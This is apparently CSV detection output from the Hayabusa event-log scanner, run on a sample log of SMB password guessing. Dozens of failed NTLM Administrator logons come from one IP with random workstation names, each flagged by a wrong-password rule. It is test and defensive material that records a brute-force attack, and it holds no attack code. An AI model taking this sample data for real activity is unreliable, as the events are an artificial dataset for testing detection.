01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: 
